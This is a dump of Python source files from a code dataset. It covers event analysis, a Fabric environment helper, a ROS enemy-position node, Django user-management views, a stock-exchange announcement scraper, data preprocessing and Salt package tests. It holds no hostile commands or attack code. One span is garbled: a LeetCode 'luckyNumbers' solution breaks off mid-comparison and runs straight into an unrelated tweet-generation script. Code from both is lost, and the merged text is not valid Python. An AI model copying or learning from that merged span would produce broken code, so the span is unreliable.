isinstance(symptom_category, EventCategory)\n # for symptom in symptom_category.event_types:\n # self.analyze_result[str(symptom)] = 1\n\nclass TestUser(User):\n def __init__(self, id):\n User.__init__(self, id)\n @staticmethod\n def get_random_year(start=2015,end=2015):\n return EventTime(randgen.randint(start,end))\n @staticmethod\n def replace_random_month(event_time,start=1,end=12):\n assert isinstance(event_time,EventTime)\n event_time.month=randgen.randint(start,end)\n @staticmethod\n def replace_random_day(event_time,start=1,end=31):\n assert isinstance(event_time,EventTime)\n end=fix_month_day(event_time.year,event_time.month,end)\n event_time.day=randgen.randint(start,end)\n @staticmethod\n def replace_random_hours(event_time,start=0,end=23):\n assert isinstance(event_time,EventTime)\n event_time.hours=randgen.randint(start,end)\n @staticmethod\n def replace_random_minutes(event_time,start=0,end=59):\n assert isinstance(event_time,EventTime)\n event_time.minutes=randgen.randint(start,end)\n @staticmethod\n def get_default_random_event_time():\n t = TestUser.get_random_year()\n TestUser.replace_random_month(t)\n TestUser.replace_random_day(t)\n TestUser.replace_random_hours(t)\n TestUser.replace_random_minutes(t)\n return t\n def add_random_events_for_day(self, num_suspects=100, num_symptoms=30):\n for i in range(num_suspects):\n self.add_event(Event(TestUser.get_default_random_event_time(), self.suspects.get_random_event_type()))\n for i in range(num_symptoms):\n self.add_event(Event(TestUser.get_default_random_event_time(), self.symptoms.get_random_event_type()))\n\nmike = TestUser('mike')\nmike.add_random_events_for_day(4000, 300)\nmike.analyze_symptoms()\nprint(str(mike))\n\n\n","sub_path":"pykos/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":12802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"527307956","text":"# -*- coding: utf-8 -*-\nimport json\n\nfrom fabric.api import env\n\nfrom .exceptions import 
EnvironmentNotDefinedError\nfrom .tasks import ulocal\n\n\ndef set_env(env_name, json_path):\n \"\"\"\n Creates a dynamic environment based on the contents of the given\n json_path. Note that a this task relies on a \"vagrant\" environment defined\n on your environments json file to populate the task's env with the proper\n Vagrant's identity file.\n\n This task must be used to create your own envionment task in your fabfile,\n for example:\n\n # /path/to/my/environments/file.json\n {\n \"vagrant\": {\n \"some_property\": \"some_value\",\n \"another_property\": \"another_value\"\n },\n \"staging\": {\n ...\n }\n }\n\n\n # fabfile.py\n from fabric.api import task\n from fabutils.env import set_env\n\n\n @task\n def environment(env_name):\n set_env(env_name, '/path/to/my/environments/file.json')\n\n @task\n def some_task():\n ...\n\n\n And call it as follows:\n\n fab envinronment:vagrant some_task\n \"\"\"\n with open(json_path, 'r') as data:\n try:\n environment = json.load(data)[env_name]\n\n except KeyError:\n raise EnvironmentNotDefinedError(\n \"The environment '{0}' is not defined in file '{1}'\".format(\n env_name, json_path\n )\n )\n\n # Update the env with the Vagrant's identity file if the given env_name is\n # \"vagrant\" and no key_filename property is defined in the current env.\n if env_name == 'vagrant' and 'key_filename' not in environment:\n result = ulocal('vagrant ssh-config | grep IdentityFile', capture=True)\n env.key_filename = result.split()[1].replace('\"', '')\n\n # Prepend the command \"source\" to each one of the commands defined in the\n # command_prefixes property of the json file.\n prefixes = environment.get('command_prefixes', [])\n sourced_prefixes = map(lambda p: 'source %s' % p, prefixes)\n environment.update(command_prefixes=sourced_prefixes)\n\n env.update(environment)\n","sub_path":"fabutils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139591860","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport rospy\n\nfrom std_msgs.msg import Float32MultiArray, String\n\n\nclass EnemyPosFromScore:\n def __init__(self):\n topic_ws = str(rospy.get_param(\"~topic_ws\"))\n\n self.side = str(rospy.get_param(\"~side\"))\n\n self.pub = rospy.Publisher(NODE_NAME, Float32MultiArray, queue_size=1)\n\n self.old = {}\n self.new = {}\n\n self.points = INIT_POINTS[self.side]\n\n rospy.Subscriber(topic_ws, String, self.ws_callback)\n\n def execute(self):\n rate = int(rospy.get_param(\"~rate\"))\n\n r = rospy.Rate(rate)\n\n while not rospy.is_shutdown():\n self.publish()\n\n r.sleep()\n\n def publish(self):\n msg = Float32MultiArray()\n\n msg.data, self.points = calc_posmap(\n self.side, self.points, self.old, self.new)\n\n self.old = self.new\n\n self.pub.publish(msg)\n\n def ws_callback(self, data):\n self.new = json_to_targets(json.loads(data.data))\n\n\ndef json_to_targets(json_data):\n targets = {}\n\n for data in json_data[\"targets\"]:\n targets[data[\"name\"]] = data[\"player\"]\n\n return targets\n\n\ndef calc_posmap(side, points, old, new):\n diff = diff_of_targets(old, new)\n\n points = calc_points(side, points, diff)\n\n posmap = points_to_posmap(points)\n\n return posmap, points\n\n\ndef diff_of_targets(old, new):\n diff = {}\n\n for name in old:\n if (name in new) and (old[name] != new[name]):\n diff[name] = new[name]\n\n else:\n diff[name] = \"u\"\n\n return diff\n\n\ndef calc_points(side, points, diff):\n if 
INV_SIDE[side] in diff.values():\n points = init_points(side, diff)\n\n else:\n points = open_points(points)\n\n return points\n\n\ndef points_to_posmap(points):\n s = sum(points)\n\n if s <= 0:\n return [0 for _ in points]\n\n return [x / s for x in points]\n\n\ndef init_points(side, diff):\n points = [0 for _ in range(CELLS)]\n\n names = [k for k, v in diff.items() if v == INV_SIDE[side]]\n\n for name in names:\n if name in POINT_MAPPING:\n for i in POINT_MAPPING[name]:\n points[i] = 1\n\n return points\n\n\ndef open_points(points):\n clone = points[:]\n\n for i in range(CELLS):\n d = clone[i] * K_OPEN_POINTS\n\n points[i] -= d * len(NEXT_CELL_MAPPING[i])\n\n for j in NEXT_CELL_MAPPING[i]:\n points[j] = max(points[j], clone[j] + d)\n\n return points\n\n\nNODE_NAME = \"enemy_pos_from_score\"\n\n\nCELLS = 24\n\n\nK_OPEN_POINTS = 0.05\n\n\nINV_SIDE = {\n \"r\": \"b\",\n \"b\": \"r\"\n}\n\n\nINIT_POINTS = {}\n\nINIT_POINTS[\"r\"] = [\n 1, 1,\n 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0,\n 0, 0\n]\n\nINIT_POINTS[\"b\"] = [\n 0, 0,\n 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0,\n 1, 1\n]\n\n\nPOINT_MAPPING = eval(\"\"\"\n{\n \"FriedShrimp_N\": [ 8, 9],\n \"FriedShrimp_W\": [ 8, 14],\n \"FriedShrimp_E\": [ 9, 15],\n \"FriedShrimp_S\": [14, 15],\n \"Tomato_N\": [ 2, 3],\n \"Tomato_S\": [ 7, 8],\n \"Omelette_N\": [ 4, 5],\n \"Omelette_S\": [ 9, 10],\n \"Pudding_N\": [13, 14],\n \"Pudding_S\": [18, 19],\n \"OctopusWiener_N\": [15, 16],\n \"OctopusWiener_S\": [20, 21]\n}\n\"\"\")\n\n\nNEXT_CELL_MAPPING = eval(\"\"\"\n[\n [ 1, 3],\n [ 0, 4],\n [ 3, 7],\n [ 0, 2, 4, 8],\n [ 1, 3, 5, 9],\n [ 4, 10],\n [ 7, 12],\n [ 2, 6, 8, 13],\n [ 3, 7, 9, 14],\n [ 4, 8, 10, 15],\n [ 5, 9, 11, 16],\n [10, 17],\n [ 6, 13],\n [ 7, 12, 14, 18],\n [ 8, 13, 15, 19],\n [ 9, 14, 16, 20],\n [10, 15, 17, 21],\n [11, 16],\n [13, 19],\n [14, 18, 20, 22],\n [15, 19, 21, 23],\n [16, 20],\n [19, 23],\n [20, 22]\n]\n\"\"\")\n\n\nif __name__ == \"__main__\":\n rospy.init_node(NODE_NAME)\n\n node = EnemyPosFromScore()\n\n node.execute()\n","sub_path":"burger_war_dev/scripts/enemy_pos_from_score.py","file_name":"enemy_pos_from_score.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"460723105","text":"class Solution:\n def luckyNumbers (self, matrix: List[List[int]]) -> List[int]:\n number=[]\n for i in range (len(matrix)):\n j= matrix[i].index(min(matrix[i]))\n \n for k in range (0,len(matrix)):\n if matrix[i][j]= 140:\n backjump()\n continue\n else:\n numchars += 1 + len(word)\n sentence.append(word)\n prev = curr\n curr = word\n output = \" \".join(sentence)\n\n# we leave ! and ? 
since they make sense isolated\noutput = [w.translate(str.maketrans('', '', '\"()[]{}«»¡¿')) for w in output.split()]\noutput = \" \".join(output)\n\np = xml.sax.saxutils.unescape(output)\nprint(p)\n\nwith open(\"archive/\"+sys.argv[1]+\"/past\", 'a+') as f:\n f.write(p+\"\\n\")\n","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"100221183","text":"\"\"\"\nScript to preprocess the kaggle titanic dataset.\n\"\"\"\nimport pandas as pd\n\nimport tools\n\npd.set_option('display.width', 800)\n\n\ndef main(ratio):\n \"\"\"\n Preprocess the data.\n \"\"\"\n # Load the raw data\n raw_data_df = load_raw_data(path_raw_data=\"data/titanic/raw_data/data.csv\")\n # Study data\n study_data(raw_data_df)\n # Transform the data\n train_data_df, test_data_df = process(raw_data_df, ratio)\n # Study transformed data\n study_data(train_data_df)\n # Store the data\n store(train_data_df, path_preprocessed_data=\"data/titanic/train_data.pkl\")\n store(test_data_df, path_preprocessed_data=\"data/titanic/test_data.pkl\")\n\n\ndef load_raw_data(path_raw_data):\n \"\"\"Load the raw data.\"\"\"\n raw_data_df = pd.read_csv(\n path_raw_data,\n nrows=10000,\n )\n return raw_data_df\n\n\ndef study_data(data_df):\n \"\"\"\n Examine the data.\n \"\"\"\n # Display shape\n print(\"- shape :\\n{}\\n\".format(data_df.shape))\n # Display data dataframe (raws and columns)\n print(\"- dataframe :\\n{}\\n\".format(data_df.head(10)))\n # Display types\n print(\"- types :\\n{}\\n\".format(data_df.dtypes))\n # Missing values\n print(\"- missing values :\\n{}\\n\".format(data_df.isnull().sum()))\n\n\n@tools.debug\ndef process(raw_data_df, ratio):\n \"\"\"\n Process the data so it can be used by the mdoel\n \"\"\"\n # Select a subset of columns\n data_df = raw_data_df[[\n \"Pclass\",\n \"Fare\",\n \"Age\",\n \"SibSp\",\n \"Parch\",\n \"Survived\"]]\n # Convert to dtype float\n for attribute in data_df.columns:\n data_df[attribute] = raw_data_df[attribute].astype(float)\n # Drop all the NaN value\n data_df.dropna(inplace=True)\n # Change output\n data_df[\"Survived\"] = data_df[\"Survived\"].apply(\n lambda x: float(-1) if x == float(0) else x)\n # Sample\n data_df = data_df.sample(frac=1,\n replace=True,\n random_state=2).reset_index(drop=True)\n alpha = int(len(data_df)*ratio)\n # Separate\n train_data_df = data_df.iloc[:alpha, :]\n test_data_df = data_df.iloc[alpha:, :]\n # Return value.\n return train_data_df, test_data_df\n\n\ndef store(data_df, path_preprocessed_data):\n \"\"\"Store the processed data.\"\"\"\n data_df.to_pickle(\n path_preprocessed_data,\n )\n","sub_path":"data/titanic/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439374189","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.utils.timezone import utc\nfrom utils.utils import custom_redirect\nimport datetime\n\nfrom .models import Kanzlei\nfrom login.models import ConventecUser\n\nfrom django.contrib.auth.models import User\n\ndef kanzlei_view(request, kanzlei_id):\n \"\"\"\n Redirects user to if not authenticated, otherwise shows kanzlei view\n \"\"\"\n \n #Redirect unauthenticated users\n if not request.user.is_authenticated:\n return redirect('index:index')\n \n #Check if user has accepted terms of use\n if not 
request.user.conventecuser.accepted_tou:\n return redirect('terms:terms')\n \n if request.user.conventecuser.kanzlei.deadline is not None and request.user.conventecuser.kanzlei.deadline <= datetime.datetime.now():\n return custom_redirect('login:error', e = 'deadline')\n \n #Check if user is admin\n if not request.user.conventecuser.role == 'admin':\n return redirect('index:index')\n \n #Get Kanzlei\n kanzlei = Kanzlei.objects.get(id = int(kanzlei_id))\n \n #Redirect if user not in kanzlei\n if request.user.conventecuser.kanzlei.id != kanzlei.id:\n return redirect('index:index')\n\n \n #Provide name of user and items the user has access to\n context = {\n 'user' : request.user,\n 'active' : {'nav' : 'kanzlei'}\n }\n \n return render(request, 'kanzlei.html', context)\n\ndef kanzlei_user(request, kanzlei_id):\n \"\"\"\n Redirects user to if not authenticated, otherwise shows users of kanzlei\n \"\"\"\n \n #Redirect unauthenticated users\n if not request.user.is_authenticated:\n return redirect('index:index')\n \n #Check if user has accepted terms of use\n if not request.user.conventecuser.accepted_tou:\n return redirect('terms:terms')\n \n #Get Kanzlei\n kanzlei = Kanzlei.objects.get(id = kanzlei_id)\n \n #Redirect if user not in kanzlei\n if request.user.conventecuser.kanzlei.id != kanzlei.id:\n return redirect('index:index')\n \n if request.method == 'GET':\n #Get sorted and reverse\n sorted_by = request.GET.get('sort', 'l_name')\n reverse = (request.GET.get('reverse', '') == 'true')\n \n vorname = request.GET.get('vorname', '')\n nachname = request.GET.get('nachname', '')\n email = request.GET.get('email', '')\n position = request.GET.get('position', '')\n role = request.GET.get('role', '')\n \n e = request.GET.get('e', False)\n\n \n #Provide name of user and items the user has access to\n context = {\n 'user' : request.user,\n 'kanzlei' : request.user.conventecuser.kanzlei,\n 'members' : list_all_members(request, sorted_by, reverse),\n 'active' : {'nav' : 'kanzlei'},\n 'vorname' : vorname,\n 'nachname' : nachname,\n 'email' : email,\n 'position' :position,\n 'role' : role,\n 'e' : e\n }\n \n return render(request, 'kanzlei_user.html', context)\n \n elif request.method == 'POST':\n if not request.user.conventecuser.role == 'admin':\n return redirect('index:index')\n \n vorname = request.POST.get('vorname', False)\n nachname = request.POST.get('nachname', False)\n email = request.POST.get('email', False)\n position = request.POST.get('position', False)\n role = request.POST.get('role', False)\n pw1 = request.POST.get('pw1', False)\n pw2 = request.POST.get('pw2', False)\n \n remove = request.POST.get('remove', False)\n \n if vorname and nachname and email and position and role and pw1 and pw2 and pw1 == pw2:\n # Check if email is already taken\n\n try:\n user = User.objects.get(email = email)\n return custom_redirect('kanzlei:kanzlei_user', kanzlei.id, e = 'email', vorname = vorname, nachname = nachname, position = position, role = role, scroll_to = 'erstellen')\n except User.DoesNotExist:\n pass\n \n new_user = ConventecUser.create(vorname, nachname, email, position, role, pw1, kanzlei)\n \n if remove:\n user = User.objects.get(id = int(remove))\n if user.conventecuser.kanzlei.id == kanzlei.id:\n user.delete()\n \n return redirect('kanzlei:kanzlei_user', kanzlei.id)\n \ndef kanzlei_user_detail(request, kanzlei_id, user_id):\n \"\"\"\n Redirects user to if not authenticated, otherwise shows users of kanzlei\n \"\"\"\n \n #Redirect unauthenticated users\n if not 
request.user.is_authenticated:\n return redirect('index:index')\n \n #Check if user has accepted terms of use\n if not request.user.conventecuser.accepted_tou:\n return redirect('terms:terms')\n \n #Get Kanzlei\n kanzlei = Kanzlei.objects.get(id = int(kanzlei_id))\n \n #Get User\n user = User.objects.get(id = int(user_id))\n \n #Redirect if user not in kanzlei\n if request.user.conventecuser.kanzlei.id != kanzlei.id or user.conventecuser.kanzlei.id != kanzlei.id:\n return redirect('index:index')\n \n if request.method == 'GET':\n \n s = request.GET.get('s', False)\n\n #Provide name of user and items the user has access to\n context = {\n 'user' : user,\n 'kanzlei' : request.user.conventecuser.kanzlei,\n 'active' : {'nav' : 'kanzlei'},\n 's' : s\n }\n \n return render(request, 'kanzlei_user_detail.html', context)\n \n elif request.method == 'POST':\n \n vorname = request.POST.get('vorname', False)\n nachname = request.POST.get('nachname', False)\n email = request.POST.get('email', False)\n position = request.POST.get('position', False)\n role = request.POST.get('role', False)\n pw1 = request.POST.get('pw1', False)\n pw2 = request.POST.get('pw2', False)\n \n if vorname:\n user.first_name = vorname\n user.save()\n \n if nachname:\n user.last_name = nachname\n user.save()\n \n if email:\n if email != user.email:\n try:\n user = User.objects.get(email = email)\n return custom_redirect('kanzlei:kanzlei_user_detail', kanzlei.id, user.id, s = 'fail', scroll_to = 'bearbeiten')\n except User.DoesNotExist:\n pass\n user.email = email\n user.save()\n \n if pw1 and pw2 and pw1 == pw2:\n user.set_password(pw1)\n user.save()\n \n if position:\n user.conventecuser.position = position\n user.conventecuser.save()\n \n if role:\n user.conventecuser.role = role\n user.conventecuser.save()\n \n \n return custom_redirect('kanzlei:kanzlei_user_detail', kanzlei.id, user.id, s = 'success', scroll_to = 'bearbeiten')\n\ndef list_all_members(request, sorted_by, reverse):\n \"\"\"\n Lists all users of a kanzlei.\n List can be sorted by: name, role, position.\n \"\"\"\n users = request.user.conventecuser.kanzlei.conventecuser_set.all()\n \n #Return sorted list\n if sorted_by == 'f_name':\n return sorted(users, key=lambda x: x.user.first_name, reverse=reverse)\n elif sorted_by == 'l_name':\n return sorted(users, key=lambda x: x.user.last_name, reverse=reverse)\n elif sorted_by == 'position':\n return sorted(users, key=lambda x: x.position, reverse=reverse)\n elif sorted_by == 'role':\n return sorted(users, key=lambda x: x.role, reverse=reverse)\n else:\n return users\n","sub_path":"kanzlei/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"85937353","text":"class Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n if n < k : return []\n elif n == k: \n return [range(1,n+1)]\n else:\n nums = range(1,n+1)\n path = []\n self.res = []\n self.DFS(nums, 0, k, path)\n return self.res\n \n def DFS(self, nums, index, k, path):\n if k == 0:\n self.res.append(path)\n return\n elif index > len(nums) - 1:\n return \n else:\n for i in xrange(index, len(nums)-k+1):\n self.DFS(nums, i+1, k-1, path+[nums[i]])\n return","sub_path":"77_combinations/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"464163617","text":"import 
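# A hedged sketch consolidating the guards repeated across the kanzlei
# views above (login, accepted terms of use, Kanzlei membership); it
# assumes the same ConventecUser/Kanzlei relations shown in views.py.
from functools import wraps
from django.shortcuts import redirect

def kanzlei_member_required(view):
    @wraps(view)
    def wrapper(request, kanzlei_id, *args, **kwargs):
        if not request.user.is_authenticated:
            return redirect('index:index')
        if not request.user.conventecuser.accepted_tou:
            return redirect('terms:terms')
        if request.user.conventecuser.kanzlei.id != int(kanzlei_id):
            return redirect('index:index')
        return view(request, kanzlei_id, *args, **kwargs)
    return wrapper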
json\nimport pytest\n\n\npytestmark = pytest.mark.usefixtures(\"master\", \"minion\", \"minion_key_accepted\")\n\n\nPRE_SLE12 = [\n ['0.2-1', '0.2~beta1-1', '-1'],\n ['0.2~beta2-1', '0.2-1', '1']\n]\n\n\nPOST_SLE12 = [\n ['0.2-1', '0.2~beta1-1', '1'],\n ['0.2~beta2-1', '0.2-1', '-1']\n]\n\n\ndef pytest_generate_tests(metafunc):\n VERSIONS = [\n ['0.2-1', '0.2-1', '0'],\n ['0.2-1.0', '0.2-1', '1'],\n ['0.2.0-1', '0.2-1', '1'],\n ['0.2-1', '1:0.2-1', '-1'],\n ['1:0.2-1', '0.2-1', '1'],\n ] + PRE_SLE12 + POST_SLE12\n metafunc.parametrize(\"params\", VERSIONS)\n\n\ndef check_params(major, params):\n if (\n (major >= 12 and params in PRE_SLE12) or\n (major < 12 and params in POST_SLE12)\n ):\n pytest.skip(\"not for this version\")\n\n\ndef test_pkg_compare(params, minion):\n info = minion['container'].get_suse_release()\n major, minor = info['VERSION'], info['PATCHLEVEL']\n\n check_params(major, params)\n\n [ver1, ver2, expected] = params\n\n command = \"salt-call pkg.version_cmp {0} --output=json -l quiet\".format(\n ' '.join([ver1, ver2])\n )\n raw = minion['container'].run(command)\n assert json.loads(raw)['local'] == int(expected)\n","sub_path":"tests/test_pkg_compare.py","file_name":"test_pkg_compare.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317596115","text":"from __main__ import *\nimport yt\n\ndef getTime( ds, iter, cutoff=5.0 ) :\n\n\ttime = ds.current_time\n\tratio = time / frameskip / (iter + 1)\n\n\tif ratio > cutoff :\n\t\tlabel = 'day'\n\telse :\n\t\tlabel = 'hr'\n\n\ttime = time.in_units(label)\n\n\treturn time, label\n\ndef getEnt( ds ) :\n\tad = ds.all_data()\n\tK = ds.arr(1.0,'K')\n\tg = ds.arr(1.0,'g')\n\tcl = ds.arr(1.0,'code_length')\n\n\tT = ad[('gas','temperature')]/K\n\tmass = ad[('gas','cell_mass')]/g\n\tV = ad[('gas','cell_volume')]/cl/cl/cl\n\n\tent = R * ( 5./2. + np.log( np.divide(V,mass) / R /h/h/h * k**2.5 * np.power( 2. * math.pi * mpart * T, 1.5 ) ) )\n\n\treturn ent\n\ndef getEnt2( ds ) :\n\tad = ds.all_data()\n\tK = ds.arr(1.0,'K')\n\tg = ds.arr(1.0,'g')\n\tcl = ds.arr(1.0,'code_length')\n\n\tT = ad[('gas','temperature')]/K\n\tmass = ad[('gas','cell_mass')]/g\n\tV = ad[('gas','cell_volume')]/cl/cl/cl\n\trho = np.divide(mass, V)\n\n\tent = R * np.divide(T, np.power(rho, gamma-1) )\n\n\treturn ent\n\ndef getEnt3( ds ) :\n\tad = ds.all_data()\n\tK = ds.arr(1.0,'K')\n\tg = ds.arr(1.0,'g')\n\tcl = ds.arr(1.0,'code_length')\n\n\tie = ad[('Gas','ie')]\n\trho = ad[('Gas','rho')]\n\n\tT = ad[('Gas','Temperature')]\n\tie = gamma/(gamma-1.) 
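# A standalone numpy sketch of the polytropic entropy proxy from
# getEnt2 above, S = R * T / rho**(gamma - 1); R = 8.314e7 erg/(mol K)
# and gamma = 5/3 are stand-in values, since the original script defines
# R, gamma and the yt unit handling elsewhere.
import numpy as np

def entropy_proxy(T, rho, R=8.314e7, gamma=5.0 / 3.0):
    return R * np.divide(T, np.power(rho, gamma - 1.0))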
* R * T\n\n\tent = (gamma-1) * np.divide(ie, np.power(rho, gamma-1) )\n\n\treturn ent\n","sub_path":"timestuff.py","file_name":"timestuff.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"339354333","text":"#encoding=utf8\n#上交所上市公司最新公告\nimport sys,uuid,re,urllib\nimport urllib2,time\nimport mysqlUtliCRUD\nimport traceback,json\nfrom lxml import etree\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nuser_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','Referer'\nuser_referer = 'http://www.sse.com.cn/disclosure/listedinfo/announcement/'\nheaders = {'User-Agent': user_agent,'referer':user_referer}\n\n\ndef get_value(n1,n2): #设定post值\n value = {'jsonCallBack':'jsonpCallback36635',\n 'isPagination':'true',\n 'productId':n1,\n 'keyWord':'',\n 'isNew':1,\n 'reportType2':'',\n 'reportType':'ALL',\n 'beginDate':'2017-01-01',\n 'endDate':'2018-04-04',\n 'pageHelp.pageSize':25,\n 'pageHelp.pageCount':50,\n 'pageHelp.pageNo':n2,\n 'pageHelp.beginPage':1,\n 'pageHelp.cacheSize':1,\n 'pageHelp.endPage':5,\n '_':1522659844167}\n return value\n\ndef get_content(str1,str2):\n try:\n siteType='0'\n url = 'http://query.sse.com.cn/security/stock/queryCompanyStatementNew.do?' #上市公司最新公告\n value = get_value(str1,str2)\n data = urllib.urlencode(value) # 把key-value这样的键值对转换成我们想要的格式\n request_1 = urllib2.Request(url, data, headers=headers)\n response_1 = urllib2.urlopen(request_1)\n page_z = response_1.read()\n page_z = page_z.replace('jsonpCallback36635(', '').replace(')', '')\n html = json.loads(page_z)\n value = html[\"pageHelp\"]\n data = value['data']\n str_time1 = time.strftime(\"%Y-%m-%d\", time.localtime(time.time())) # 添加新闻时间\n list1 = []\n list2 = []\n for i in data:\n SSEDate=i['SSEDate']\n date1 = SSEDate\n #if 0==0:\n if date1 == str_time1:\n try:\n URL_s = i['URL']\n title = i['title']\n url_2 = 'http://www.sse.com.cn'+URL_s\n url_2 = str(url_2).encode('utf8')\n new_code = uuid.uuid3(uuid.NAMESPACE_DNS, url_2)\n new_code = str(new_code).replace('-', '').encode('utf8')\n upURL = url\n absURL = url_2\n website = '上海证券交易所(上市公司最新公告)'\n source = website\n author = '未知'\n publish_time = date1 + ' 00:00:00'\n crawl_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time())) # 爬取数据时间\n summary = title\n downloadDate = crawl_time\n spider_person = 'cyz'\n if (url_2.find('.doc') > 0):\n fileType = 'doc'\n elif (url_2.find('.DOC') > 0):\n fileType = 'doc'\n elif (url_2.find('.pdf') > 0):\n fileType = 'pdf'\n elif (url_2.find('.PDF') > 0):\n fileType = 'pdf'\n else:\n fileType = 'none'\n fileAddress = url_2\n fileParsing = 0\n data_1 = [siteType, new_code, title, upURL, absURL, website, source, author, publish_time, crawl_time, summary,\n downloadDate, spider_person, fileType, fileAddress, fileParsing]\n list1.append(data_1)\n except:\n URL_s = i['URL']\n url_2 = 'http://www.sse.com.cn' + URL_s\n omit = '%s--------%s' % (str_time1, url_2) + '\\n'\n try_log = open('sjs_sgg_%s.log' %(str_time1), 'a')\n try_log.write(omit)\n try_log.close()\n mysqlUtliCRUD.mysqlUtil('insert ignore into gbi_pd_news_match(siteType,new_code,title,upURL,absURL,website,source,author,publish_time,crawl_time,summary,downloadDate,spider_person,fileType,fileAddress,fileParsing) \\\n values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)', list1).addbatchmysql()\n except:\n f = open(\"sjs_sgg.log\", 'a')\n traceback.print_exc(file=f)\n f.flush()\n 
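# A minimal sketch of unwrapping the JSONP payload fetched above.
# Stripping every ')' as the code above does would also delete any
# parentheses inside the JSON body; a single anchored regex avoids that.
import json
import re

def unwrap_jsonp(payload):
    match = re.match(r'^[\w$]+\((.*)\)\s*;?\s*$', payload, re.S)
    return json.loads(match.group(1) if match else payload)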
f.close()\n\n\n\n\n\ndef get_code():\n aa = mysqlUtliCRUD.mysqlUtil('select sjs_code,sjs_gsjc from sjs_gs',0).getmysql()\n for i in aa:\n sjs_code =i[0]\n for m in xrange(1,100):\n try:\n get_content(sjs_code,m)\n except:\n pass\n\n\nget_code()\n","sub_path":"pycharm/wpf/dongfangzhenquan/cyz/SJS_SGG2.py","file_name":"SJS_SGG2.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"301810862","text":"import wx\nimport os, re, sys, copy, string\nfrom os.path import join\nimport json, shutil, glob\n\nfrom datetime import datetime \nfrom copy import deepcopy\nfrom pprint import pprint as pp\nfrom ui.include.log_init import info, debug\nfrom ui.include.utils import dict2, exception\nfrom ui.include.common import *\n\ne=sys.exit\n\nimport ui.config.ui_config as ui_config \nuic = ui_config.uic\n\nfrom ui.include.Config import Config\nfrom ui.include.Layout import Layout\n\n\n\nclass UiLayout(Config): \n\n def __init__(self, pipeline):\n \n Config.__init__(self)\n self.cfg = None\n self.pref=None\n self.ppl=pipeline\n self.layout_dir=self.getLayoutDir()\n #self.build_loc = join(UI_TMP_DIR, BUILD_DIR, BUILD_FN )\n self.build_tmpl_loc = join(uic.root, UI_DIR, INCLUDE_DIR, BUILD_DIR, BUILD_TMPL_FN )\n @exception\n def loadLayout(self):\n global cfg\n \n self.layout_fn = self.getLayoutFile()\n self.layout_name = self.getLayoutName()\n \n\n self.layout_loc= join(uic.root, self.layout_fn)\n\n assert os.path.isfile(self.layout_loc), 'UI layout does not exists\\n%s\\n%s' % (self.layout_loc,self.layout_fn)\n cfg=load_config(config_path = self.layout_loc)\n return cfg\n\n def getLayoutDir(self):\n\n \n out = join (os.getcwd(),UI_DIR,PIPELINE_DIR, self.ppl)\n\n assert out\n return out\n \n \n def getLayoutFile(self):\n\n \n out = join (os.getcwd(),UI_DIR,PIPELINE_DIR, self.ppl, self.getLayoutName())\n\n assert out\n return out\n def getLayoutName(self):\n \n out = self.ppl.split(os.path.sep)[-1]\n\n assert out\n return '%s.json' % out\n \n def getNode_LayoutRoot(self, nref, ntype):\n api = getattr(sbc, 'get%sRoot' % ntype)\n return os.path.join(api(nref),self.LAYOUT_DIR)\n \n \n def getAllLayouts(self, pref):\n \n\n out={}\n for k, ntype in self.ntypes.items():\n if k in pref: \n out.update(self.getNode_LayoutList(pref, ntype))\n \n return out\n\n def getNode_LayoutList(self, pref, ntype):\n api = getattr(self,'get%sCopyRef' % ntype)\n nref = api(pref)\n layout_root = self.getNode_LayoutRoot(nref, ntype)\n return {os.path.relpath(file,self.root):nref for file in glob.glob(os.path.join(layout_root, JSON_EXT))}\n\n\n\n \n \n def assertExists(self):\n assert os.path.isdir(self.cfg_root), 'Config root does not exists for app \"%s\"' % self.app_name\n assert os.path.isdir(self.layout_root), 'Layout root does not exists for app \"%s\"\\n%s' % (self.app_name,self.layout_root)\n return self\n \n \n def getLayoutList(self):\n return [os.path.basename(file) for file in glob.glob(os.path.join(self.layout_root, JSON_EXT))]\n\n\n\n \n def get(self, key, default = None):\t\n global cfg\n if not 'cfg' in globals():\n self.cfg=cfg=self.loadLayout()\n\n return self.cfg.get(key, default)\n \n def items(self):\n \n global cfg\n if not 'cfg' in globals():\n 